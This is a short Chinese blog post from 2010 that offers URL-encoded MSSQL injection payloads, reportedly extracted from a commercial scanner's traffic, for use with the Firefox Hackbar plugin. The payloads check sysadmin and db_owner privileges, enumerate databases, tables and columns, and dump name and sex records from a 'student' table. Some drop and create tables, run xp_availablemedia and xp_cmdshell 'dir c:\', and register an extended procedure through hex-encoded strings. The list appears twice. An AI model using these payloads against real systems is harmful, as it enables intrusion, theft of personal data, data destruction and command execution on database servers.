SQL注入测试

想想一切是否又回到原点，不能被动的让自己虚拟化啊！

二月 28th, 2010

Written by admin

从一个商业检测软件的抓包中提取到注入语句的参数.在FF中配合Hackbar 插件 ,效果应该灰常棒.

贴上语句:

%20and%20user=0--

%20and%20db_name()%3E0--%20and%201=1

%20and%20@@version%3E1--%20and%201=1

%20and%20@@servername%3E0--%20and%201=1

%20and%20user%3E0--%20and%201=1
   %20and%20cast(is_member(0x640062005f006f0077006e0065007200)%20as%20nvarchar(1))%2bchar(124)=1%20and%201=1
   %20and%20cast(is_srvrolemember(0x73006500740075007000610064006d0069006e00)%20as%20nvarchar(1))%2bchar(124)=1%20and%201=1
   %20and%20cast(is_srvrolemember(0x73006500630075007200690074007900610064006d0069006e00)%20as%20nvarchar(1))%2bchar(124)=1%20and%201=1
   %20and%20cast(is_srvrolemember(0x620075006c006b00610064006d0069006e00)%20as%20nvarchar(1))%2bchar(124)=1%20and%201=1
   %20and%200%3C(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%20from(select%20top%20%201%20dbid,name%20from%20[master].[dbo].[sysdatabases]%20order%20by%20[dbid])%20t%20order%20by%20[dbid]%20desc)--%20and%201=1
   %20and%200%3C(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%20from(select%20top%20%202%20dbid,name%20from%20[master].[dbo].[sysdatabases]%20order%20by%20[dbid])%20t%20order%20by%20[dbid]%20desc)--%20and%201=1
   %20and%200%3C(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%20from(select%20top%20%203%20dbid,name%20from%20[master].[dbo].[sysdatabases]%20order%20by%20[dbid])%20t%20order%20by%20[dbid]%20desc)--%20and%201=1

%20;drop%20table%20foofoofoo;--%20and%201=1

%20;insert%20foofoofoo%20exec%20master.dbo.xp_availablemedia;--%20and%201=1

%20;drop%20table%20foofoofoo;--%20and%201=1

%20;create%20table%20foofoofoo(name%20nvarchar(255),description%20nvarchar(4000));--%20and%201=1
   %20and%200%3C(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bcast([description]%20as%20nvarchar(4000))%20from(select%20top%20%201%20*%20from%20foofoofoo%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)--%20and%201=1
   %20and%20(select%20cast(count(*)%20as%20varchar(10))%2bchar(94)%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%201%20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%202%20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%203%20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%204%20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%205%20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%206%20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%207%20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%208%20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%209%20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%2010%20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(id%20as%20nvarchar(20))%2bchar(124)%20from%20[main]..[sysobjects]%20where%20name=0x730074007500640065006e007400)%3E0--%20and%201=1
   %20and%20(select%20cast(count(*)%20as%20varchar(10))%2bchar(94)%20from%20[main]..[syscolumns]%20where%20id=869578136)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%202%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%203%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%204%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%205%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%206%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%207%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%208%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%209%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%2010%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%2011%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
   %20and%20(select%20cast(count(*)%20as%20varchar(8000))%2bchar(94)%20from%20[main]..[student]%20where%201=1)%3E0--%20and%201=1
   %20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%20from%20(select%20top%201%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
   %20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%20from%20(select%20top%202%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
   %20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%20from%20(select%20top%203%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
   %20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%20from%20(select%20top%204%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
   %20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%20from%20(select%20top%205%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
   %20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%20from%20(select%20top%206%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
   %20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%20from%20(select%20top%207%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
   %20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%20from%20(select%20top%208%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
   %20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%20from%20(select%20top%209%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
   %20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%20from%20(select%20top%2010%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
   %20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%20from%20(select%20top%2011%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
   %20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%20from%20(select%20top%2012%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
   %20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%20from%20(select%20top%2013%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1

%20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%20from%20(select%20top%2014%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
   %20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%20from%20(select%20top%2015%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
   %20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%20from%20(select%20top%2016%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
   %20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%20from%20(select%20top%2017%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
   %20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%20from%20(select%20top%2018%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
   %20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%20from%20(select%20top%2019%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1

%20;create%20table%20foofoofoo%20(a%20image);--%20and%201=1
   %20;drop%20table%20foofoofoo;create%20table%20foofoofoo([id]%20[int]%20identity%20(1,1)%20not%20null,[name]%20[nvarchar]%20(300)%20not%20null,[depth]%20[int]%20not%20null,[isfile]%20[nvarchar]%20(50)%20null);--%20and%201=1
   %20and%20(select%20cast(count(*)%20as%20varchar(8000))%2bchar(94)%20from%20foofoofoo)%3E0--%20and%201=1
   %20;declare%20@s%20varchar(4000)%20set%20@s=cast(0x64726f70207461626c6520666f6f666f6f666f6f3b435245415445205441424c45205b666f6f666f6f666f6f5d285b526573756c745478745d206e76617263686172283430303029204e554c4c293b62756c6b20696e73657274205b666f6f666f6f666f6f5d2066726f6d2027633a5c273b416c746572205461626c65205b666f6f666f6f666f6f5d2061646420696420696e74204e4f54204e554c4c204944454e544954592028312c31293b%20as%20varchar(4000));exec(@s)--%20and%201=1

%20;drop%20table%20foofoofoo;--%20and%201=1

%20;insert%20foofoofoo%20exec%20master.dbo.xp_availablemedia;--%20and%201=1
   %20and%200%3C(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bcast([type]%20as%20nvarchar(4000))%20from(select%20top%20%201%20*%20from%20foofoofoo%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)--%20and%201=1
   %20;drop%20table%20foofoofoo;create%20table%20foofoofoo([id]%20[int]%20identity%20(1,1)%20not%20null,[name]%20[nvarchar]%20(300)%20not%20null,[depth]%20[int]%20not%20null,[isfile]%20[nvarchar]%20(50)%20null);--%20and%201=1
   %20and%20(select%20cast(count(*)%20as%20varchar(8000))%2bchar(94)%20from%20foofoofoo)%3E0--%20and%201=1
   %20;drop%20table%20foofoofoo;create%20table%20foofoofoo([id]%20[int]%20identity%20(1,1)%20not%20null,[name]%20[nvarchar]%20(300)%20not%20null,[depth]%20[int]%20not%20null,[isfile]%20[nvarchar]%20(50)%20null);--%20and%201=1
   %20and%20(select%20cast(count(*)%20as%20varchar(8000))%2bchar(94)%20from%20foofoofoo)%3E0--%20and%201=1
   %20;drop%20table%20foofoofoo;create%20table%20foofoofoo([id]%20[int]%20identity%20(1,1)%20not%20null,[name]%20[nvarchar]%20(300)%20not%20null,[depth]%20[int]%20not%20null,[isfile]%20[nvarchar]%20(50)%20null);--%20and%201=1
   %20and%20(select%20cast(count(*)%20as%20varchar(8000))%2bchar(94)%20from%20foofoofoo)%3E0--%20and%201=1

%20;create%20table%20[foofoofoo]([resulttxt]%20nvarchar(4000)%20null);--%20and%201=1
   %20;exec%20master.dbo.sp_addextendedproc%200x730070005f004f004100430072006500610074006500,%200x780070006c006f006700370030002e0064006c006c00--%20and%201=1
   %20;declare%20@z%20nvarchar(4000)%20set%20@z=0x640069007200200063003a005c00%20insert%20into%20[foofoofoo](resulttxt)%20exec%20master.dbo.xp_cmdshell%20@z;alter%20table%20[foofoofoo]%20add%20id%20int%20not%20null%20identity%20(1,1)--%20and%201=1

%20;drop%20table%20[foofoofoo];--%20and%201=1
   %20and%20substring(cast(serverproperty(0x700072006f006400750063007400760065007200730069006f006e00)%20as%20nvarchar(4000)),%201,%201)%3E8%20and%201=1

%20and%20user=0--

%20and%20db_name()%3E0--%20and%201=1

%20and%20@@version%3E1--%20and%201=1

%20and%20@@servername%3E0--%20and%201=1

%20and%20user%3E0--%20and%201=1
   %20and%20cast(is_member(0x640062005f006f0077006e0065007200)%20as%20nvarchar(1))%2bchar(124)=1%20and%201=1
   %20and%20cast(is_srvrolemember(0x73006500740075007000610064006d0069006e00)%20as%20nvarchar(1))%2bchar(124)=1%20and%201=1
   %20and%20cast(is_srvrolemember(0x73006500630075007200690074007900610064006d0069006e00)%20as%20nvarchar(1))%2bchar(124)=1%20and%201=1
   %20and%20cast(is_srvrolemember(0x620075006c006b00610064006d0069006e00)%20as%20nvarchar(1))%2bchar(124)=1%20and%201=1
   %20and%200%3C(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%20from(select%20top%20%201%20dbid,name%20from%20[master].[dbo].[sysdatabases]%20order%20by%20[dbid])%20t%20order%20by%20[dbid]%20desc)--%20and%201=1
   %20and%200%3C(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%20from(select%20top%20%202%20dbid,name%20from%20[master].[dbo].[sysdatabases]%20order%20by%20[dbid])%20t%20order%20by%20[dbid]%20desc)--%20and%201=1
   %20and%200%3C(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%20from(select%20top%20%203%20dbid,name%20from%20[master].[dbo].[sysdatabases]%20order%20by%20[dbid])%20t%20order%20by%20[dbid]%20desc)--%20and%201=1

%20;drop%20table%20foofoofoo;--%20and%201=1

%20;insert%20foofoofoo%20exec%20master.dbo.xp_availablemedia;--%20and%201=1

%20;drop%20table%20foofoofoo;--%20and%201=1

%20;create%20table%20foofoofoo(name%20nvarchar(255),description%20nvarchar(4000));--%20and%201=1
   %20and%200%3C(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bcast([description]%20as%20nvarchar(4000))%20from(select%20top%20%201%20*%20from%20foofoofoo%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)--%20and%201=1
   %20and%20(select%20cast(count(*)%20as%20varchar(10))%2bchar(94)%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%201%20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%202%20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%203%20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%204%20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%205%20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%206%20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%207%20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%208%20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%209%20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%2010%20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(id%20as%20nvarchar(20))%2bchar(124)%20from%20[main]..[sysobjects]%20where%20name=0x730074007500640065006e007400)%3E0--%20and%201=1
   %20and%20(select%20cast(count(*)%20as%20varchar(10))%2bchar(94)%20from%20[main]..[syscolumns]%20where%20id=869578136)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%202%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%203%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%204%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%205%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%206%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%207%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%208%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%209%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%2010%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
   %20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%2011%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
   %20and%20(select%20cast(count(*)%20as%20varchar(8000))%2bchar(94)%20from%20[main]..[student]%20where%201=1)%3E0--%20and%201=1
